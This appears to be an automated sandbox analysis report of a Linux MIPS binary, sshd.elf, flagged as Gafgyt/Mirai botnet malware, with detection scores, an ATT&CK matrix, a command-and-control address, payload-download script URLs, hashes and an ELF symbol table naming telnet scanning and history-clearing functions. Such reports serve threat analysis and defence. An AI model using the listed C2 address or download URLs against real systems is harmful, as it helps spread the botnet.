          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
          Source: Initial sampleUser agent string found: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
          Source: Initial sampleUser agent string found: Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.2.2; AFTB Build/JDQ39) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.173 Mobile Safari/537.22
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: sshd.elf, type: SAMPLE
          Source: Yara matchFile source: sshd.elf, type: SAMPLE
          Source: Yara matchFile source: 5437.1.00007f9f78400000.00007f9f78421000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 5439.1.00007f9f78400000.00007f9f78421000.r-x.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
          Masquerading
          OS Credential Dumping11
          Security Software Discovery
          Remote ServicesData from Local System1
          Data Obfuscation
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          File Deletion
          LSASS Memory1
          Remote System Discovery
          Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging2
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          {
            "C2 url": "93.115.172.234:6667"
          }
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1650657 Sample: sshd.elf Startdate: 27/03/2025 Architecture: LINUX Score: 84 21 93.115.172.234, 60886, 60888, 60890 ALTER-NET-ASZorilorNr11SfGheorgheRO Romania 2->21 23 34.254.182.186, 443, 54636 AMAZON-02US United States 2->23 25 daisy.ubuntu.com 2->25 27 Found malware configuration 2->27 29 Antivirus / Scanner detection for submitted sample 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 2 other signatures 2->33 8 sshd.elf 2->8         started        11 dash rm 2->11         started        13 dash cat 2->13         started        15 8 other processes 2->15 signatures3 process4 signatures5 35 Opens /proc/net/* files useful for finding connected devices and routers 8->35 17 sshd.elf 8->17         started        process6 process7 19 sshd.elf 17->19         started       
          SourceDetectionScannerLabelLink
          sshd.elf67%ReversingLabsLinux.Trojan.Gafgyt
          sshd.elf100%AviraEXP/ELF.Gafgyt.U
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches

          Download Network PCAP: filteredfull

          NameIPActiveMaliciousAntivirus DetectionReputation
          daisy.ubuntu.com
          162.213.35.25
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            93.115.172.234:6667false
              high
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.WISEnutbot.com)sshd.elffalse
                high
                http://www.baidu.com/search/spider.html)sshd.elffalse
                  high
                  http://www.billybobbot.com/crawler/)sshd.elffalse
                    high
                    http://fast.no/support/crawler.asp)sshd.elffalse
                      high
                      http://www.chainn.com/mxbot.html)sshd.elffalse
                        high
                        http://code.google.com/appengine;sshd.elffalse
                          high
                          http://www.google.com/bot.html)sshd.elffalse
                            high
                            http://www.brandwatch.net)sshd.elffalse
                              high
                              http://help.yahoo.com/help/us/shop/merchant/)sshd.elffalse
                                high
                                http://www.yodao.com/help/webmaster/spider/;sshd.elffalse
                                  high
                                  http://www.beslist.nl/sshd.elffalse
                                    high
                                    http://www.majestic12.co.uk/bot.php?sshd.elffalse
                                      high
                                      http://www.google.com/feedfetcher.html;sshd.elffalse
                                        high
                                        http://majestic12.co.uk/bot.php?sshd.elffalse
                                          high
                                          http://search.msn.com/msnbot.htm)sshd.elffalse
                                            high
                                            http://about.ask.com/en/docs/about/webmasters.shtml)sshd.elffalse
                                              high
                                              http://www.terrawiz.com/bot.html)sshd.elffalse
                                                high
                                                http://help.yahoo.com/help/us/ysearch/slurp)sshd.elffalse
                                                  high
                                                  http://wortschatz.uni-leipzig.de/findlinks/)sshd.elffalse
                                                    high
                                                    http://www.gigablast.com/spider.html)sshd.elffalse
                                                      high
                                                      http://www.80legs.com/webcrawler.html)sshd.elffalse
                                                        high
                                                        http://www.become.com/site_owners.html)sshd.elffalse
                                                          high
                                                          http://46.101.35.30/shitty.sh;sshd.elffalse
                                                            unknown
                                                            http://93.115.172.234/bins.sh;sshd.elffalse
                                                              high
                                                              http://www.huaweisymantec.com/en/IRL/spider)sshd.elffalse
                                                                high
                                                                http://www.sogou.com/docs/help/webmasters.htm#07)sshd.elffalse
                                                                  high
                                                                  http://www.moreover.com;sshd.elffalse
                                                                    high
                                                                    http://tinyurl.com/64t5n)sshd.elffalse
                                                                      high
                                                                      http://feedback.redkolibri.com/sshd.elffalse
                                                                        high
                                                                        http://www.baidu.com/search/spider.htm)sshd.elffalse
                                                                          high
                                                                          http://www.googlebot.com/bot.html)sshd.elffalse
                                                                            high
                                                                            http://w.moreover.com;sshd.elffalse
                                                                              high
                                                                              http://www.mojeek.com/bot.html)sshd.elffalse
                                                                                high
                                                                                http://sp.ask.com/docs/about/tech_crawling.html)sshd.elffalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  34.254.182.186
                                                                                  unknownUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  93.115.172.234
                                                                                  unknownRomania
                                                                                  39531ALTER-NET-ASZorilorNr11SfGheorgheROtrue
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  34.254.182.186na.elfGet hashmaliciousPrometeiBrowse
                                                                                    SecuriteInfo.com.Linux.Mirai.4306.30063.19032.elfGet hashmaliciousUnknownBrowse
                                                                                      hanoi.arm.elfGet hashmaliciousUnknownBrowse
                                                                                        arm6.elfGet hashmaliciousUnknownBrowse
                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                            GoldAge3ATOmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                                                x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                  morte.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                    arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                      93.115.172.234ntpd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                        sshd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                          tftp.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                            wget.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              apache2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                ftp.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                  ntpd.elfGet hashmaliciousGafgytBrowse
                                                                                                                    bash.elfGet hashmaliciousGafgytBrowse
                                                                                                                      wget.elfGet hashmaliciousGafgytBrowse
                                                                                                                        cron.elfGet hashmaliciousGafgytBrowse
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          daisy.ubuntu.combejv86.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.213.35.25
                                                                                                                          rrrdsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.213.35.25
                                                                                                                          efea6.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.213.35.25
                                                                                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.213.35.25
                                                                                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.213.35.24
                                                                                                                          sshd.elfGet hashmaliciousGafgytBrowse
                                                                                                                          • 162.213.35.24
                                                                                                                          cron.elfGet hashmaliciousGafgytBrowse
                                                                                                                          • 162.213.35.25
                                                                                                                          SecuriteInfo.com.ELF.Mirai-AXV.27459.929.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.213.35.24
                                                                                                                          SecuriteInfo.com.Linux.Mirai.4306.7848.16619.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.213.35.24
                                                                                                                          SecuriteInfo.com.Linux.Mirai.2522.20371.24695.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.213.35.25
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          ALTER-NET-ASZorilorNr11SfGheorgheROntpd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          sshd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          tftp.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          wget.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          apache2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          ftp.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          pp.pd.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 93.115.172.125
                                                                                                                          ntpd.elfGet hashmaliciousGafgytBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          bash.elfGet hashmaliciousGafgytBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          wget.elfGet hashmaliciousGafgytBrowse
                                                                                                                          • 93.115.172.234
                                                                                                                          AMAZON-02USna.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 54.170.242.139
                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 54.170.242.139
                                                                                                                          https://mahoganydevelopment.knack.com/untitled-appGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 13.216.201.204
                                                                                                                          .gksed.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.249.145.219
                                                                                                                          rrrdsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.249.145.219
                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 54.170.242.139
                                                                                                                          http://cqchome.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 13.33.252.88
                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 54.170.242.139
                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 34.249.145.219
                                                                                                                          spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 54.247.62.1
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          fb4726d465c5f28b84cd6d14cedd13a7na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          wget.elfGet hashmaliciousGafgytBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          apache2.elfGet hashmaliciousGafgytBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          SecuriteInfo.com.Linux.Mirai.2522.5402.17083.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          vjwe68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          efefa7.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 34.254.182.186
                                                                                                                          No context
                                                                                                                          No created / dropped files found
                                                                                                                          File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
                                                                                                                          Entropy (8bit):5.599215888024637
                                                                                                                          TrID:
                                                                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                          File name:sshd.elf
                                                                                                                          File size:174'955 bytes
                                                                                                                          MD5:8c184e48a5a22b3444fcb029391d7e91
                                                                                                                          SHA1:cde922465869cc7f84d0ad315276594363b7f834
                                                                                                                          SHA256:44d4a2750bfcb8a436106ea06f92a3062660d24e3d48dc1d2d4e2479150dc806
                                                                                                                          SHA512:20405559462247ff0740eecc052cdca7c9fe2f685b8e320f03e512fc96eca843b50b9552bbff7ddb66983e258af8a59d825a1d8cb153fab536c7b98013f6815a
                                                                                                                          SSDEEP:3072:C0uz84mwFN7BwetJ8add9QzhspyOHsqdfi+KqLwZi+LUk:C0uz8OFdyetJ8addQkDTdfi+KqLwU+Lf
                                                                                                                          TLSH:D904D81B6B618EB3D81ECD33029A1201108DDD6B55D93BAFB6B4E95CE76A84F05E3DC0
                                                                                                                          File Content Preview:.ELF......................@.4....S......4. ...(........p......@...@...........................@...@.X...X.....................F...F.(....z..........Q.td..................................................F....<...'!......'.......................<...'!... ..

                                                                                                                          ELF header

                                                                                                                          Class:ELF32
                                                                                                                          Data:2's complement, little endian
                                                                                                                          Version:1 (current)
                                                                                                                          Machine:MIPS R3000
                                                                                                                          Version Number:0x1
                                                                                                                          Type:EXEC (Executable file)
                                                                                                                          OS/ABI:UNIX - System V
                                                                                                                          ABI Version:0
                                                                                                                          Entry Point Address:0x4002a0
                                                                                                                          Flags:0x1007
                                                                                                                          ELF Header Size:52
                                                                                                                          Program Header Offset:52
                                                                                                                          Program Header Size:32
                                                                                                                          Number of Program Headers:4
                                                                                                                          Section Header Offset:152540
                                                                                                                          Section Header Size:40
                                                                                                                          Number of Section Headers:21
                                                                                                                          Header String Table Index:18
                                                                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                          NULL0x00x00x00x00x0000
                                                                                                                          .reginfoMIPS_REGINFO0x4000b40xb40x180x180x2A004
                                                                                                                          .initPROGBITS0x4000cc0xcc0x8c0x00x6AX004
                                                                                                                          .textPROGBITS0x4001600x1600x179000x00x6AX0016
                                                                                                                          .finiPROGBITS0x417a600x17a600x5c0x00x6AX004
                                                                                                                          .rodataPROGBITS0x417ac00x17ac00x94940x00x2A0016
                                                                                                                          .eh_framePROGBITS0x420f540x20f540x40x00x2A004
                                                                                                                          .ctorsPROGBITS0x4610000x210000x80x00x3WA004
                                                                                                                          .dtorsPROGBITS0x4610080x210080x80x00x3WA004
                                                                                                                          .jcrPROGBITS0x4610100x210100x40x00x3WA004
                                                                                                                          .data.rel.roPROGBITS0x4610140x210140xac00x00x3WA004
                                                                                                                          .dataPROGBITS0x461ae00x21ae00x7000x00x3WA0016
                                                                                                                          .gotPROGBITS0x4621e00x221e00x5480x40x10000003WAp0016
                                                                                                                          .sbssNOBITS0x4627280x227280x200x00x10000003WAp004
                                                                                                                          .bssNOBITS0x4627500x227280x63a40x00x3WA0016
                                                                                                                          .commentPROGBITS0x00x227280xc180x00x0001
                                                                                                                          .mdebug.abi32PROGBITS0xc180x233400x00x00x0001
                                                                                                                          .pdrPROGBITS0x00x233400x20000x00x0004
                                                                                                                          .shstrtabSTRTAB0x00x253400x9a0x00x0001
                                                                                                                          .symtabSYMTAB0x00x257240x30600x100x0203194
                                                                                                                          .strtabSTRTAB0x00x287840x23e70x00x0001
                                                                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                          <unknown>0xb40x4000b40x4000b40x180x180.98340x4R 0x4.reginfo
                                                                                                                          LOAD0x00x4000000x4000000x20f580x20f585.65670x5R E0x10000.reginfo .init .text .fini .rodata .eh_frame
                                                                                                                          LOAD0x210000x4610000x4610000x17280x7af44.79090x6RW 0x10000.ctors .dtors .jcr .data.rel.ro .data .got .sbss .bss
                                                                                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                                                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                                                                          .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                          .symtab0x4000b40SECTION<unknown>DEFAULT1
                                                                                                                          .symtab0x4000cc0SECTION<unknown>DEFAULT2
                                                                                                                          .symtab0x4001600SECTION<unknown>DEFAULT3
                                                                                                                          .symtab0x417a600SECTION<unknown>DEFAULT4
                                                                                                                          .symtab0x417ac00SECTION<unknown>DEFAULT5
                                                                                                                          .symtab0x420f540SECTION<unknown>DEFAULT6
                                                                                                                          .symtab0x4610000SECTION<unknown>DEFAULT7
                                                                                                                          .symtab0x4610080SECTION<unknown>DEFAULT8
                                                                                                                          .symtab0x4610100SECTION<unknown>DEFAULT9
                                                                                                                          .symtab0x4610140SECTION<unknown>DEFAULT10
                                                                                                                          .symtab0x461ae00SECTION<unknown>DEFAULT11
                                                                                                                          .symtab0x4621e00SECTION<unknown>DEFAULT12
                                                                                                                          .symtab0x4627280SECTION<unknown>DEFAULT13
                                                                                                                          .symtab0x4627500SECTION<unknown>DEFAULT14
                                                                                                                          .symtab0x00SECTION<unknown>DEFAULT15
                                                                                                                          .symtab0xc180SECTION<unknown>DEFAULT16
                                                                                                                          .symtab0x00SECTION<unknown>DEFAULT17
                                                                                                                          .symtab0x00SECTION<unknown>DEFAULT18
                                                                                                                          .symtab0x00SECTION<unknown>DEFAULT19
                                                                                                                          .symtab0x00SECTION<unknown>DEFAULT20
                                                                                                                          C.290.5998.symtab0x461014144OBJECT<unknown>DEFAULT10
                                                                                                                          C.339.6371.symtab0x4610b02596OBJECT<unknown>DEFAULT10
                                                                                                                          C.340.6372.symtab0x4610a412OBJECT<unknown>DEFAULT10
                                                                                                                          ClearHistory.symtab0x40807c160FUNC<unknown>DEFAULT3
                                                                                                                          GetRandomIP.symtab0x404698172FUNC<unknown>DEFAULT3
                                                                                                                          GetRandomPublicIP.symtab0x403e7c2076FUNC<unknown>DEFAULT3
                                                                                                                          Nranges.symtab0x461b1464OBJECT<unknown>DEFAULT11
                                                                                                                          PromServer.symtab0x461cb84OBJECT<unknown>DEFAULT11
                                                                                                                          Q.symtab0x46278c16384OBJECT<unknown>DEFAULT14
                                                                                                                          TelnetScanner.symtab0x404dd86820FUNC<unknown>DEFAULT3
                                                                                                                          UpdateBins.symtab0x4089fc196FUNC<unknown>DEFAULT3
                                                                                                                          _GLOBAL_OFFSET_TABLE_.symtab0x4621e00OBJECT<unknown>DEFAULT12
                                                                                                                          _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                          _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __CTOR_END__.symtab0x4610040OBJECT<unknown>DEFAULT7
                                                                                                                          __CTOR_LIST__.symtab0x4610000OBJECT<unknown>DEFAULT7
                                                                                                                          __C_ctype_b.symtab0x461e004OBJECT<unknown>DEFAULT11
                                                                                                                          __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __C_ctype_b_data.symtab0x41f7b0768OBJECT<unknown>DEFAULT5
                                                                                                                          __C_ctype_tolower.symtab0x4621804OBJECT<unknown>DEFAULT11
                                                                                                                          __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __C_ctype_tolower_data.symtab0x420af0768OBJECT<unknown>DEFAULT5
                                                                                                                          __C_ctype_toupper.symtab0x461e104OBJECT<unknown>DEFAULT11
                                                                                                                          __C_ctype_toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __C_ctype_toupper_data.symtab0x41fab0768OBJECT<unknown>DEFAULT5
                                                                                                                          __DTOR_END__.symtab0x46100c0OBJECT<unknown>DEFAULT8
                                                                                                                          __DTOR_LIST__.symtab0x4610080OBJECT<unknown>DEFAULT8
                                                                                                                          __EH_FRAME_BEGIN__.symtab0x420f540OBJECT<unknown>DEFAULT6
                                                                                                                          __FRAME_END__.symtab0x420f540OBJECT<unknown>DEFAULT6
                                                                                                                          __GI___C_ctype_b.symtab0x461e004OBJECT<unknown>HIDDEN11
                                                                                                                          __GI___C_ctype_b_data.symtab0x41f7b0768OBJECT<unknown>HIDDEN5
                                                                                                                          __GI___C_ctype_tolower.symtab0x4621804OBJECT<unknown>HIDDEN11
                                                                                                                          __GI___C_ctype_tolower_data.symtab0x420af0768OBJECT<unknown>HIDDEN5
                                                                                                                          __GI___C_ctype_toupper.symtab0x461e104OBJECT<unknown>HIDDEN11
                                                                                                                          __GI___C_ctype_toupper_data.symtab0x41fab0768OBJECT<unknown>HIDDEN5
                                                                                                                          __GI___ctype_b.symtab0x461e044OBJECT<unknown>HIDDEN11
                                                                                                                          __GI___ctype_tolower.symtab0x4621844OBJECT<unknown>HIDDEN11
                                                                                                                          __GI___ctype_toupper.symtab0x461e144OBJECT<unknown>HIDDEN11
                                                                                                                          __GI___errno_location.symtab0x40cea024FUNC<unknown>HIDDEN3
                                                                                                                          __GI___fgetc_unlocked.symtab0x414190388FUNC<unknown>HIDDEN3
                                                                                                                          __GI___glibc_strerror_r.symtab0x40fcd068FUNC<unknown>HIDDEN3
                                                                                                                          __GI___h_errno_location.symtab0x41310024FUNC<unknown>HIDDEN3
                                                                                                                          __GI___libc_fcntl.symtab0x40c3e0136FUNC<unknown>HIDDEN3
                                                                                                                          __GI___libc_fcntl64.symtab0x40c470104FUNC<unknown>HIDDEN3
                                                                                                                          __GI___libc_open.symtab0x40ca30124FUNC<unknown>HIDDEN3
                                                                                                                          __GI___uClibc_fini.symtab0x4126e0196FUNC<unknown>HIDDEN3
                                                                                                                          __GI___uClibc_init.symtab0x41283c140FUNC<unknown>HIDDEN3
                                                                                                                          __GI___xpg_strerror_r.symtab0x40fd20392FUNC<unknown>HIDDEN3
                                                                                                                          __GI__exit.symtab0x40c4e080FUNC<unknown>HIDDEN3
                                                                                                                          __GI_abort.symtab0x415950428FUNC<unknown>HIDDEN3
                                                                                                                          __GI_atoi.symtab0x411fc028FUNC<unknown>HIDDEN3
                                                                                                                          __GI_atol.symtab0x411fc028FUNC<unknown>HIDDEN3
                                                                                                                          __GI_brk.symtab0x415b30112FUNC<unknown>HIDDEN3
                                                                                                                          __GI_chdir.symtab0x40c53088FUNC<unknown>HIDDEN3
                                                                                                                          __GI_close.symtab0x40c59084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_connect.symtab0x4107a084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_dup2.symtab0x40c5f084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_errno.symtab0x4689f04OBJECT<unknown>HIDDEN14
                                                                                                                          __GI_execl.symtab0x412340204FUNC<unknown>HIDDEN3
                                                                                                                          __GI_execve.symtab0x412dd084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_exit.symtab0x412250236FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fclose.symtab0x40cec0512FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fcntl.symtab0x40c3e0136FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fcntl64.symtab0x40c470104FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fflush_unlocked.symtab0x40f0b0628FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fgetc_unlocked.symtab0x414190388FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fgets.symtab0x40ed70216FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fgets_unlocked.symtab0x40f330268FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fopen.symtab0x40d0c028FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fork.symtab0x40c65084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fputs.symtab0x40ee50200FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fputs_unlocked.symtab0x40f440128FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fseek.symtab0x415c0068FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fseeko64.symtab0x415c50388FUNC<unknown>HIDDEN3
                                                                                                                          __GI_fwrite_unlocked.symtab0x40f4c0280FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getc_unlocked.symtab0x414190388FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getcwd.symtab0x40c6b0364FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getdtablesize.symtab0x40c82072FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getegid.symtab0x412e3088FUNC<unknown>HIDDEN3
                                                                                                                          __GI_geteuid.symtab0x412e9088FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getgid.symtab0x412ef084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_gethostbyname.symtab0x4102c0116FUNC<unknown>HIDDEN3
                                                                                                                          __GI_gethostbyname_r.symtab0x4103401108FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getpagesize.symtab0x40c87048FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getpid.symtab0x40c8a084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getrlimit.symtab0x40c90084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getsockname.symtab0x41080084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_getuid.symtab0x412f5084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_h_errno.symtab0x4689f44OBJECT<unknown>HIDDEN14
                                                                                                                          __GI_inet_addr.symtab0x41027072FUNC<unknown>HIDDEN3
                                                                                                                          __GI_inet_aton.symtab0x4149d0280FUNC<unknown>HIDDEN3
                                                                                                                          __GI_inet_ntoa.symtab0x41024c32FUNC<unknown>HIDDEN3
                                                                                                                          __GI_inet_ntoa_r.symtab0x410190188FUNC<unknown>HIDDEN3
                                                                                                                          __GI_inet_ntop.symtab0x416980852FUNC<unknown>HIDDEN3
                                                                                                                          __GI_inet_pton.symtab0x4164d0700FUNC<unknown>HIDDEN3
                                                                                                                          __GI_initstate_r.symtab0x411c30328FUNC<unknown>HIDDEN3
                                                                                                                          __GI_ioctl.symtab0x40c960104FUNC<unknown>HIDDEN3
                                                                                                                          __GI_isatty.symtab0x41002060FUNC<unknown>HIDDEN3
                                                                                                                          __GI_kill.symtab0x40c9d088FUNC<unknown>HIDDEN3
                                                                                                                          __GI_lseek64.symtab0x417630164FUNC<unknown>HIDDEN3
                                                                                                                          __GI_memchr.symtab0x414320264FUNC<unknown>HIDDEN3
                                                                                                                          __GI_memcpy.symtab0x40f5e0308FUNC<unknown>HIDDEN3
                                                                                                                          __GI_memmove.symtab0x414430816FUNC<unknown>HIDDEN3
                                                                                                                          __GI_mempcpy.symtab0x41476076FUNC<unknown>HIDDEN3
                                                                                                                          __GI_memrchr.symtab0x4147b0272FUNC<unknown>HIDDEN3
                                                                                                                          __GI_memset.symtab0x40f720144FUNC<unknown>HIDDEN3
                                                                                                                          __GI_nanosleep.symtab0x412fb084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_open.symtab0x40ca30124FUNC<unknown>HIDDEN3
                                                                                                                          __GI_pipe.symtab0x40c3a064FUNC<unknown>HIDDEN3
                                                                                                                          __GI_poll.symtab0x415ba084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_printf.symtab0x40d0e092FUNC<unknown>HIDDEN3
                                                                                                                          __GI_raise.symtab0x4175e076FUNC<unknown>HIDDEN3
                                                                                                                          __GI_random.symtab0x411600164FUNC<unknown>HIDDEN3
                                                                                                                          __GI_random_r.symtab0x411a0c176FUNC<unknown>HIDDEN3
                                                                                                                          __GI_rawmemchr.symtab0x416170200FUNC<unknown>HIDDEN3
                                                                                                                          __GI_read.symtab0x40cb5084FUNC<unknown>HIDDEN3
